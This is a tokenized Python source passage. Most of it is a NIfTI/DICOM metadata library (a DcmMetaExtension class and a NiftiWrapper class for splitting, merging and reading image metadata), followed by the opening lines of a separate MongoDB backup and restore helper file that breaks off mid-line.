<EOL> end_idx = start_idx + n_slices <EOL> result . extend ( src_dict [ key ] [ start_idx : end_idx ] ) <EOL> return result <EOL> def _copy_sample ( self , other , src_class , sample_base , idx ) : <EOL> '''<STR_LIT>''' <EOL> assert src_class != ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> src_dict = other . get_class_dict ( src_class ) <EOL> if src_class [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> if src_class [ <NUM_LIT:0> ] == sample_base : <EOL> best_dest = None <EOL> for dest_cls in ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if ( dest_cls != src_class and <EOL> dest_cls in self . 
get_valid_classes ( ) <EOL> ) : <EOL> best_dest = dest_cls <EOL> break <EOL> dest_mult = self . get_multiplicity ( dest_cls ) <EOL> if dest_mult == <NUM_LIT:1> : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = deepcopy ( vals [ idx ] ) <EOL> else : <EOL> stride = other . shape [ <NUM_LIT:3> ] <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( dest_cls ) [ key ] = deepcopy ( vals [ idx : : stride ] ) <EOL> for key in src_dict . keys ( ) : <EOL> self . _simplify ( key ) <EOL> else : <EOL> if src_class == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> dest_mult = self . get_multiplicity ( src_class ) <EOL> start_idx = idx * dest_mult <EOL> end_idx = start_idx + dest_mult <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals [ start_idx : end_idx ] ) <EOL> self . _simplify ( key ) <EOL> else : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> if src_class [ <NUM_LIT:0> ] == sample_base : <EOL> best_dest = None <EOL> for dest_class in self . _preserving_changes [ src_class ] : <EOL> if dest_class in self . get_valid_classes ( ) : <EOL> best_dest = dest_class <EOL> break <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( best_dest ) [ key ] = deepcopy ( vals ) <EOL> elif src_class [ <NUM_LIT:0> ] != '<STR_LIT>' : <EOL> if sample_base == '<STR_LIT:time>' : <EOL> n_slices = self . n_slices <EOL> start_idx = idx * n_slices <EOL> end_idx = start_idx + n_slices <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals [ start_idx : end_idx ] ) <EOL> self . _simplify ( key ) <EOL> else : <EOL> for key , vals in src_dict . iteritems ( ) : <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( vals ) <EOL> else : <EOL> for key , vals in src_dict . 
iteritems ( ) : <EOL> subset_vals = other . _global_slice_subset ( key , sample_base , idx ) <EOL> self . get_class_dict ( src_class ) [ key ] = deepcopy ( subset_vals ) <EOL> self . _simplify ( key ) <EOL> def _insert ( self , dim , other ) : <EOL> self_slc_norm = self . slice_normal <EOL> other_slc_norm = other . slice_normal <EOL> use_slices = ( not self_slc_norm is None and <EOL> not other_slc_norm is None and <EOL> np . allclose ( self_slc_norm , other_slc_norm ) ) <EOL> other_slc_meta = { } <EOL> if not use_slices : <EOL> for classes in other . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> other_slc_meta [ classes ] = other . get_class_dict ( classes ) <EOL> other . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = { } <EOL> missing_keys = list ( set ( self . get_keys ( ) ) - set ( other . get_keys ( ) ) ) <EOL> for other_classes in other . get_valid_classes ( ) : <EOL> other_keys = other . get_class_dict ( other_classes ) . keys ( ) <EOL> if other_classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> other_keys += missing_keys <EOL> for key in other_keys : <EOL> local_classes = self . get_classification ( key ) <EOL> if local_classes != other_classes : <EOL> local_allow = self . _preserving_changes [ local_classes ] <EOL> other_allow = self . _preserving_changes [ other_classes ] <EOL> if other_classes in local_allow : <EOL> self . _change_class ( key , other_classes ) <EOL> elif not local_classes in other_allow : <EOL> best_dest = None <EOL> for dest_class in local_allow : <EOL> if ( dest_class [ <NUM_LIT:0> ] in self . _content and <EOL> dest_class in other_allow ) : <EOL> best_dest = dest_class <EOL> break <EOL> self . _change_class ( key , best_dest ) <EOL> for key in other_keys : <EOL> if dim == self . slice_dim : <EOL> self . _insert_slice ( key , other ) <EOL> elif dim < <NUM_LIT:3> : <EOL> self . _insert_non_slice ( key , other ) <EOL> elif dim == <NUM_LIT:3> : <EOL> self . 
_insert_sample ( key , other , '<STR_LIT:time>' ) <EOL> elif dim == <NUM_LIT:4> : <EOL> self . _insert_sample ( key , other , '<STR_LIT>' ) <EOL> if not use_slices : <EOL> for classes in other . get_valid_classes ( ) : <EOL> if classes [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> other . _content [ classes [ <NUM_LIT:0> ] ] [ classes [ <NUM_LIT:1> ] ] = other_slc_meta [ classes ] <EOL> def _insert_slice ( self , key , other ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if local_vals != other_vals : <EOL> for dest_base in ( '<STR_LIT:time>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if dest_base in self . _content : <EOL> self . _change_class ( key , ( dest_base , '<STR_LIT>' ) ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( dest_base , <EOL> '<STR_LIT>' ) , <EOL> self . slice_dim <EOL> ) <EOL> self . get_values ( key ) . extend ( other_vals ) <EOL> break <EOL> elif classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> local_vals . extend ( other_vals ) <EOL> else : <EOL> if classes != ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _change_class ( key , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> local_vals = self . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . slice_dim ) <EOL> n_slices = self . n_slices <EOL> other_n_slices = other . n_slices <EOL> shape = self . shape <EOL> n_vols = <NUM_LIT:1> <EOL> for dim_size in shape [ <NUM_LIT:3> : ] : <EOL> n_vols *= dim_size <EOL> intlv = [ ] <EOL> loc_start = <NUM_LIT:0> <EOL> oth_start = <NUM_LIT:0> <EOL> for vol_idx in xrange ( n_vols ) : <EOL> intlv += local_vals [ loc_start : loc_start + n_slices ] <EOL> intlv += other_vals [ oth_start : oth_start + other_n_slices ] <EOL> loc_start += n_slices <EOL> oth_start += other_n_slices <EOL> self . 
get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] = intlv <EOL> def _insert_non_slice ( self , key , other ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if local_vals != other_vals : <EOL> del self . get_class_dict ( classes ) [ key ] <EOL> def _insert_sample ( self , key , other , sample_base ) : <EOL> local_vals , classes = self . get_values_and_class ( key ) <EOL> other_vals = other . _get_changed_class ( key , classes , self . slice_dim ) <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if local_vals != other_vals : <EOL> self . _change_class ( key , ( sample_base , '<STR_LIT>' ) ) <EOL> local_vals = self . get_values ( key ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( sample_base , '<STR_LIT>' ) , <EOL> self . slice_dim <EOL> ) <EOL> local_vals . extend ( other_vals ) <EOL> elif classes == ( sample_base , '<STR_LIT>' ) : <EOL> local_vals . extend ( other_vals ) <EOL> else : <EOL> if classes != ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . _change_class ( key , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> local_vals = self . get_values ( key ) <EOL> other_vals = other . _get_changed_class ( key , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> self . slice_dim ) <EOL> shape = self . shape <EOL> n_dims = len ( shape ) <EOL> if sample_base == '<STR_LIT:time>' and n_dims == <NUM_LIT:5> : <EOL> n_slices = self . n_slices <EOL> slices_per_vec = n_slices * shape [ <NUM_LIT:3> ] <EOL> oth_slc_per_vec = n_slices * other . shape [ <NUM_LIT:3> ] <EOL> intlv = [ ] <EOL> loc_start = <NUM_LIT:0> <EOL> oth_start = <NUM_LIT:0> <EOL> for vec_idx in xrange ( shape [ <NUM_LIT:4> ] ) : <EOL> intlv += local_vals [ loc_start : loc_start + slices_per_vec ] <EOL> intlv += other_vals [ oth_start : oth_start + oth_slc_per_vec ] <EOL> loc_start += slices_per_vec <EOL> oth_start += oth_slc_per_vec <EOL> self . 
get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] = intlv <EOL> else : <EOL> local_vals . extend ( other_vals ) <EOL> nb . nifti1 . extension_codes . add_codes ( ( ( dcm_meta_ecode , <EOL> "<STR_LIT>" , <EOL> DcmMetaExtension ) , ) <EOL> ) <EOL> class MissingExtensionError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' <EOL> def patch_dcm_ds_is ( dcm ) : <EOL> '''<STR_LIT>''' <EOL> for elem in dcm : <EOL> if elem . VM == <NUM_LIT:1> : <EOL> if elem . VR in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if elem . value == '<STR_LIT>' : <EOL> continue <EOL> if elem . VR == '<STR_LIT>' : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = float ( elem . value ) <EOL> else : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = int ( elem . value ) <EOL> else : <EOL> if elem . VR in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if elem . value == '<STR_LIT>' : <EOL> continue <EOL> if elem . VR == '<STR_LIT>' : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = [ float ( val ) for val in elem . value ] <EOL> else : <EOL> elem . VR = '<STR_LIT>' <EOL> elem . value = [ int ( val ) for val in elem . value ] <EOL> class NiftiWrapper ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , nii_img , make_empty = False ) : <EOL> self . nii_img = nii_img <EOL> hdr = nii_img . get_header ( ) <EOL> self . meta_ext = None <EOL> for extension in hdr . extensions : <EOL> if extension . get_code ( ) == dcm_meta_ecode : <EOL> try : <EOL> extension . check_valid ( ) <EOL> except InvalidExtensionError , e : <EOL> print "<STR_LIT>" % e <EOL> else : <EOL> if not self . meta_ext is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . meta_ext = extension <EOL> if not self . meta_ext : <EOL> if make_empty : <EOL> slice_dim = hdr . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> self . meta_ext = DcmMetaExtension . make_empty ( self . nii_img . shape , <EOL> hdr . get_best_affine ( ) , <EOL> None , <EOL> slice_dim ) <EOL> hdr . 
extensions . append ( self . meta_ext ) <EOL> else : <EOL> raise MissingExtensionError <EOL> self . meta_ext . check_valid ( ) <EOL> def __getitem__ ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> return self . meta_ext . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) [ key ] <EOL> def meta_valid ( self , classification ) : <EOL> '''<STR_LIT>''' <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return True <EOL> img_shape = self . nii_img . get_shape ( ) <EOL> meta_shape = self . meta_ext . shape <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:4> : ] == img_shape [ <NUM_LIT:4> : ] <EOL> if classification == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> : ] == img_shape [ <NUM_LIT:3> : ] <EOL> hdr = self . nii_img . get_header ( ) <EOL> if self . meta_ext . n_slices != hdr . get_n_slices ( ) : <EOL> return False <EOL> slice_dim = hdr . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> slice_dir = self . nii_img . get_affine ( ) [ slice_dim , : <NUM_LIT:3> ] <EOL> slices_aligned = np . allclose ( slice_dir , <EOL> self . meta_ext . slice_normal , <EOL> atol = <NUM_LIT> ) <EOL> if classification == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return slices_aligned <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> ] == img_shape [ <NUM_LIT:3> ] and slices_aligned <EOL> if classification == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return meta_shape [ <NUM_LIT:3> : ] == img_shape [ <NUM_LIT:3> : ] and slices_aligned <EOL> def get_meta ( self , key , index = None , default = None ) : <EOL> '''<STR_LIT>''' <EOL> values , classes = self . meta_ext . get_values_and_class ( key ) <EOL> if classes is None : <EOL> return default <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return values <EOL> if not self . meta_valid ( classes ) : <EOL> return default <EOL> if not index is None : <EOL> shape = self . nii_img . 
get_shape ( ) <EOL> if len ( index ) != len ( shape ) : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> for dim , ind_val in enumerate ( index ) : <EOL> if not <NUM_LIT:0> <= ind_val < shape [ dim ] : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> if classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> return values [ index [ <NUM_LIT:3> ] ] <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return values [ index [ <NUM_LIT:4> ] ] <EOL> slice_dim = self . nii_img . get_header ( ) . get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> n_slices = shape [ slice_dim ] <EOL> if classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> for count , idx_val in enumerate ( index [ <NUM_LIT:3> : ] ) : <EOL> val_idx += idx_val * n_slices <EOL> n_slices *= shape [ count + <NUM_LIT:3> ] <EOL> return values [ val_idx ] <EOL> elif classes == ( '<STR_LIT:time>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> return values [ val_idx ] <EOL> elif classes == ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> val_idx = index [ slice_dim ] <EOL> val_idx += index [ <NUM_LIT:3> ] * n_slices <EOL> return values [ val_idx ] <EOL> return default <EOL> def remove_extension ( self ) : <EOL> '''<STR_LIT>''' <EOL> hdr = self . nii_img . get_header ( ) <EOL> target_idx = None <EOL> for idx , ext in enumerate ( hdr . extensions ) : <EOL> if id ( ext ) == id ( self . meta_ext ) : <EOL> target_idx = idx <EOL> break <EOL> else : <EOL> raise IndexError ( '<STR_LIT>' ) <EOL> del hdr . extensions [ target_idx ] <EOL> hdr [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> def replace_extension ( self , dcmmeta_ext ) : <EOL> '''<STR_LIT>''' <EOL> self . remove_extension ( ) <EOL> self . nii_img . get_header ( ) . extensions . append ( dcmmeta_ext ) <EOL> self . meta_ext = dcmmeta_ext <EOL> def split ( self , dim = None ) : <EOL> '''<STR_LIT>''' <EOL> shape = self . nii_img . get_shape ( ) <EOL> data = self . nii_img . get_data ( ) <EOL> header = self . nii_img . get_header ( ) <EOL> slice_dim = header . 
get_dim_info ( ) [ <NUM_LIT:2> ] <EOL> if dim is None : <EOL> dim = len ( shape ) - <NUM_LIT:1> <EOL> if dim == <NUM_LIT:2> : <EOL> if slice_dim is None : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> dim = slice_dim <EOL> trans_update = None <EOL> if dim < <NUM_LIT:3> : <EOL> trans_update = header . get_best_affine ( ) [ : <NUM_LIT:3> , dim ] <EOL> split_hdr = header . copy ( ) <EOL> slices = [ slice ( None ) ] * len ( shape ) <EOL> for idx in xrange ( shape [ dim ] ) : <EOL> if dim >= <NUM_LIT:3> and dim == len ( shape ) - <NUM_LIT:1> : <EOL> slices [ dim ] = idx <EOL> else : <EOL> slices [ dim ] = slice ( idx , idx + <NUM_LIT:1> ) <EOL> split_data = data [ slices ] . copy ( ) <EOL> if not trans_update is None and idx != <NUM_LIT:0> : <EOL> qform = split_hdr . get_qform ( ) <EOL> if not qform is None : <EOL> qform [ : <NUM_LIT:3> , <NUM_LIT:3> ] += trans_update <EOL> split_hdr . set_qform ( qform ) <EOL> sform = split_hdr . get_sform ( ) <EOL> if not sform is None : <EOL> sform [ : <NUM_LIT:3> , <NUM_LIT:3> ] += trans_update <EOL> split_hdr . set_sform ( sform ) <EOL> split_nii = nb . Nifti1Image ( split_data , <EOL> split_hdr . get_best_affine ( ) , <EOL> header = split_hdr ) <EOL> meta_dim = dim <EOL> if dim == slice_dim : <EOL> meta_dim = self . meta_ext . slice_dim <EOL> split_meta = self . meta_ext . get_subset ( meta_dim , idx ) <EOL> result = NiftiWrapper ( split_nii ) <EOL> result . replace_extension ( split_meta ) <EOL> yield result <EOL> def to_filename ( self , out_path ) : <EOL> '''<STR_LIT>''' <EOL> self . meta_ext . check_valid ( ) <EOL> self . nii_img . to_filename ( out_path ) <EOL> @ classmethod <EOL> def from_filename ( klass , path ) : <EOL> '''<STR_LIT>''' <EOL> return klass ( nb . load ( path ) ) <EOL> @ classmethod <EOL> def from_dicom_wrapper ( klass , dcm_wrp , meta_dict = None ) : <EOL> '''<STR_LIT>''' <EOL> data = dcm_wrp . get_data ( ) <EOL> affine = np . dot ( np . 
diag ( [ - <NUM_LIT:1.> , - <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) , dcm_wrp . get_affine ( ) ) <EOL> if len ( data . shape ) == <NUM_LIT:2> : <EOL> data = data . reshape ( data . shape + ( <NUM_LIT:1> , ) ) <EOL> nii_img = nb . nifti1 . Nifti1Image ( data , affine ) <EOL> hdr = nii_img . get_header ( ) <EOL> hdr . set_xyzt_units ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dim_info = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:2> <EOL> } <EOL> if hasattr ( dcm_wrp . dcm_data , '<STR_LIT>' ) : <EOL> if dcm_wrp [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> else : <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> dim_info [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> hdr . set_dim_info ( ** dim_info ) <EOL> result = klass ( nii_img , make_empty = True ) <EOL> result . meta_ext . reorient_transform = np . eye ( <NUM_LIT:4> ) <EOL> if meta_dict : <EOL> result . meta_ext . get_class_dict ( ( '<STR_LIT>' , '<STR_LIT>' ) ) . update ( meta_dict ) <EOL> return result <EOL> @ classmethod <EOL> def from_dicom ( klass , dcm_data , meta_dict = None ) : <EOL> '''<STR_LIT>''' <EOL> dcm_wrp = wrapper_from_data ( dcm_data ) <EOL> return klass . from_dicom_wrapper ( dcm_wrp , meta_dict ) <EOL> @ classmethod <EOL> def from_sequence ( klass , seq , dim = None ) : <EOL> '''<STR_LIT>''' <EOL> n_inputs = len ( seq ) <EOL> first_input = seq [ <NUM_LIT:0> ] <EOL> first_nii = first_input . nii_img <EOL> first_hdr = first_nii . get_header ( ) <EOL> shape = first_nii . shape <EOL> affine = first_nii . get_affine ( ) . 
copy ( ) <EOL> if dim is None : <EOL> if len ( shape ) == <NUM_LIT:3> : <EOL> singular_dim = None <EOL> for dim_idx , dim_size in enumerate ( shape ) : <EOL> if dim_size == <NUM_LIT:1> : <EOL> singular_dim = dim_idx <EOL> if singular_dim is None : <EOL> dim = <NUM_LIT:3> <EOL> else : <EOL> dim = singular_dim <EOL> if len ( shape ) == <NUM_LIT:4> : <EOL> dim = <NUM_LIT:4> <EOL> else : <EOL> if not <NUM_LIT:0> <= dim < <NUM_LIT:5> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if dim < len ( shape ) and shape [ dim ] != <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> axes = [ ] <EOL> for axis_idx in xrange ( <NUM_LIT:3> ) : <EOL> axis_vec = affine [ : <NUM_LIT:3> , axis_idx ] <EOL> if axis_idx == dim : <EOL> axis_vec = axis_vec . copy ( ) <EOL> axis_vec /= np . sqrt ( np . dot ( axis_vec , axis_vec ) ) <EOL> axes . append ( axis_vec ) <EOL> trans = affine [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> result_shape = list ( shape ) <EOL> while dim >= len ( result_shape ) : <EOL> result_shape . append ( <NUM_LIT:1> ) <EOL> result_shape [ dim ] = n_inputs <EOL> result_dtype = max ( input_wrp . nii_img . get_data ( ) . dtype <EOL> for input_wrp in seq ) <EOL> result_data = np . empty ( result_shape , dtype = result_dtype ) <EOL> hdr_info = { '<STR_LIT>' : first_hdr . get_qform ( ) , <EOL> '<STR_LIT>' : first_hdr [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : first_hdr . get_sform ( ) , <EOL> '<STR_LIT>' : first_hdr [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : list ( first_hdr . get_dim_info ( ) ) , <EOL> '<STR_LIT>' : list ( first_hdr . get_xyzt_units ( ) ) , <EOL> } <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . get_slice_duration ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . get_intent ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> hdr_info [ '<STR_LIT>' ] = first_hdr . 
get_slice_times ( ) <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> data_slices = [ slice ( None ) ] * len ( result_shape ) <EOL> for dim_idx , dim_size in enumerate ( result_shape ) : <EOL> if dim_size == <NUM_LIT:1> : <EOL> data_slices [ dim_idx ] = <NUM_LIT:0> <EOL> last_trans = None <EOL> for input_idx in range ( n_inputs ) : <EOL> input_wrp = seq [ input_idx ] <EOL> input_nii = input_wrp . nii_img <EOL> input_aff = input_nii . get_affine ( ) <EOL> input_hdr = input_nii . get_header ( ) <EOL> for axis_idx , axis_vec in enumerate ( axes ) : <EOL> in_vec = input_aff [ : <NUM_LIT:3> , axis_idx ] <EOL> if axis_idx == dim : <EOL> in_vec = in_vec . copy ( ) <EOL> in_vec /= np . sqrt ( np . dot ( in_vec , in_vec ) ) <EOL> in_trans = input_aff [ : <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> if not last_trans is None : <EOL> trans_diff = in_trans - last_trans <EOL> if not np . allclose ( trans_diff , <NUM_LIT:0.0> ) : <EOL> trans_diff /= np . sqrt ( np . dot ( trans_diff , trans_diff ) ) <EOL> if ( np . allclose ( trans_diff , <NUM_LIT:0.0> ) or <EOL> not np . allclose ( np . dot ( trans_diff , in_vec ) , <EOL> <NUM_LIT:1.0> , <EOL> atol = <NUM_LIT> ) <EOL> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> last_trans = in_trans <EOL> if not np . allclose ( in_vec , axis_vec , atol = <NUM_LIT> ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data_slices [ dim ] = input_idx <EOL> result_data [ data_slices ] = input_nii . get_data ( ) . squeeze ( ) <EOL> if input_idx != <NUM_LIT:0> : <EOL> if ( hdr_info [ '<STR_LIT>' ] is None or <EOL> input_hdr . get_qform ( ) is None or <EOL> not np . allclose ( input_hdr . get_qform ( ) , hdr_info [ '<STR_LIT>' ] ) <EOL> ) : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if input_hdr [ '<STR_LIT>' ] != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if ( hdr_info [ '<STR_LIT>' ] is None or <EOL> input_hdr . get_sform ( ) is None or <EOL> not np . 
allclose ( input_hdr . get_sform ( ) , hdr_info [ '<STR_LIT>' ] ) <EOL> ) : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> if input_hdr [ '<STR_LIT>' ] != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> in_dim_info = list ( input_hdr . get_dim_info ( ) ) <EOL> if in_dim_info != hdr_info [ '<STR_LIT>' ] : <EOL> for idx in xrange ( <NUM_LIT:3> ) : <EOL> if in_dim_info [ idx ] != hdr_info [ '<STR_LIT>' ] [ idx ] : <EOL> hdr_info [ '<STR_LIT>' ] [ idx ] = None <EOL> in_xyzt_units = list ( input_hdr . get_xyzt_units ( ) ) <EOL> if in_xyzt_units != hdr_info [ '<STR_LIT>' ] : <EOL> for idx in xrange ( <NUM_LIT:2> ) : <EOL> if in_xyzt_units [ idx ] != hdr_info [ '<STR_LIT>' ] [ idx ] : <EOL> hdr_info [ '<STR_LIT>' ] [ idx ] = None <EOL> try : <EOL> if input_hdr . get_slice_duration ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> if input_hdr . get_intent ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> try : <EOL> if input_hdr . get_slice_times ( ) != hdr_info [ '<STR_LIT>' ] : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> except HeaderDataError : <EOL> hdr_info [ '<STR_LIT>' ] = None <EOL> scaled_dim_dir = None <EOL> if dim < <NUM_LIT:3> : <EOL> scaled_dim_dir = seq [ <NUM_LIT:1> ] . nii_img . get_affine ( ) [ : <NUM_LIT:3> , <NUM_LIT:3> ] - trans <EOL> affine [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii = nb . Nifti1Image ( result_data , affine ) <EOL> result_hdr = result_nii . get_header ( ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None and hdr_info [ '<STR_LIT>' ] is not None : <EOL> if not scaled_dim_dir is None : <EOL> hdr_info [ '<STR_LIT>' ] [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii . 
set_qform ( hdr_info [ '<STR_LIT>' ] , <EOL> int ( hdr_info [ '<STR_LIT>' ] ) , <EOL> update_affine = True ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None and hdr_info [ '<STR_LIT>' ] is not None : <EOL> if not scaled_dim_dir is None : <EOL> hdr_info [ '<STR_LIT>' ] [ : <NUM_LIT:3> , dim ] = scaled_dim_dir <EOL> result_nii . set_sform ( hdr_info [ '<STR_LIT>' ] , <EOL> int ( hdr_info [ '<STR_LIT>' ] ) , <EOL> update_affine = True ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_dim_info ( * hdr_info [ '<STR_LIT>' ] ) <EOL> slice_dim = hdr_info [ '<STR_LIT>' ] [ <NUM_LIT:2> ] <EOL> else : <EOL> slice_dim = None <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_intent ( * hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_xyzt_units ( * hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_slice_duration ( hdr_info [ '<STR_LIT>' ] ) <EOL> if hdr_info [ '<STR_LIT>' ] is not None : <EOL> result_hdr . set_slice_times ( hdr_info [ '<STR_LIT>' ] ) <EOL> seq_exts = [ elem . meta_ext for elem in seq ] <EOL> result_ext = DcmMetaExtension . from_sequence ( seq_exts , <EOL> dim , <EOL> affine , <EOL> slice_dim ) <EOL> result_hdr . extensions . append ( result_ext ) <EOL> return NiftiWrapper ( result_nii ) </s>
<s> import os <EOL> import shutil <EOL> import zipfile <EOL> from datetime import datetime <EOL> from . mongo import restore , dump_db <EOL> from . utils import temp_directory , exit_with_message , zipdir <EOL> def local_restore ( zip_path , to_environment ) : <EOL> zip = zipfile . ZipFile ( zip_path ) <EOL> with temp_directory ( ) as temp_dir : <EOL> zip . extractall ( path = temp_dir ) <EOL> restore ( temp_dir , to_environment ) <EOL> def local_backups ( local_config ) : <EOL> if '<STR_LIT>' not in local_config : <EOL> exit_with_message ( '<STR_LIT>' ) <EOL> backup_dir = local_config [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( backup_dir ) : <EOL> exit_with_message ( '<STR_LIT>' . format ( backup_dir ) ) <EOL> backups = { } <EOL> for item in os . listdir ( backup_dir ) : <EOL> backups [ item ] = os . path . join ( backup_dir , item ) <EOL> return backups <EOL> def backup_localy ( environment , local_settings , name , query_set_class = None ) : <EOL> if '<STR_LIT>' not in local_settings : <EOL> exit_with_message ( '<STR_LIT>' ) <EOL> backup_dir = local_settings [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( backup_dir ) : <EOL> exit_with_message ( '<STR_LIT>' . format ( backup_dir ) ) <EOL> dump_path = dump_db ( environment , QuerySet = query_set_class ) <EOL> zipf = zipdir ( dump_path ) <EOL> unique_file_path = 